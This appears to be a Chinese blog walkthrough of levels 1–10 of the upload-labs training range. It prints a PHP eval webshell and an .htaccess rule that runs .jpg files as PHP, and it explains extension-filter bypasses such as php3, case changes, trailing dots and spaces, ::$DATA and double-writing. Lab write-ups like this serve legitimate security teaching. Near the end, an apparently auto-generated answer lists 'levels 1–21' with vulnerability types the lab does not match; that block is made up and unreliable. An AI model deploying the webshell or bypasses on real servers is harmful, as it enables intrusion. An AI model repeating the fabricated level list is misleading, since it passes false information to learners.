upload-labs靶场:1—10通关教程

目录

Pass-01(JS 验证)

Pass-02(MIME)

Pass-03(黑名单绕过)

Pass-04(.htaccess 绕过)

Pass-05(大小写绕过)

Pass-06(空格绕过)

Pass-07(小数点绕过)

Pass-08(::$DATA 绕过)

Pass-09(小数点和空格结合绕过)

Pass-10(双写绕过)


下载地址:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场

1.php 内容:

<?php @eval($_POST[cmd]);?>

Pass-01(JS 验证)

复制一个 php 文件,重命名 1.jpg

<?php @eval($_POST[cmd]);?>

上传,然后拦截数据包,通过burp修改后缀,修改后放包(Burp发送后数据包是已经经过了前端,所以前端校验就会失效),后缀改为php

右键复制图像链接

用蚁剑测试链接

Pass-02(MIME)

提交 抓包 修改后缀为 php

Pass-03(黑名单绕过)

查看源码, 不允许上传.asp,.aspx,.php,.jsp后缀文件

修改 httpd.conf 文件中的这行代码,把前面的#去掉

抓包 修改后缀为 php3

Pass-04(.htaccess 绕过)

黑名单过滤太多,使用 .htaccess 绕过,内容如下,先把 .htaccess 上传,再上传 1.jpg

<FilesMatch "jpg">
 SetHandler application/x-httpd-php
 </FilesMatch>

Pass-05(大小写绕过)

查看源码, 上一关的.htaccess文件也过滤掉了,发现没有过滤大小写,本关就用大小写绕过

上传 1.php 一句话木马,抓包修改后缀

Pass-06(空格绕过)

查看源码,大小写被过滤,没有过滤空格,就用空格过滤

上传 1.php 一句话木马,抓包,后缀加一个空格

Pass-07(小数点绕过)

查看源码,大小写被过滤,空格被过滤,没有过滤小数点,就用小数点过滤

上传 1.php 一句话木马,抓包,后缀加个小数点

Pass-08(::$DATA 绕过)

查看源码,小数点 大小写 空格 都被过滤,用 ::$DATA 过滤

上传 1.php 一句话木马,抓包,后缀加 ::$DATA

连接时删掉 ::$DATA

Pass-09(小数点和空格结合绕过)

查看源码,::$DATA 也被过滤,使用结合过滤

上传 1.php 一句话木马,抓包,后缀加 小数点 空格 小数点

Pass-10(双写绕过)

查看源码, str_ireplace()函数 将危险后缀都替换为空,然后尝试用双写绕过

上传 1.php 一句话木马,抓包,修改后缀

  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值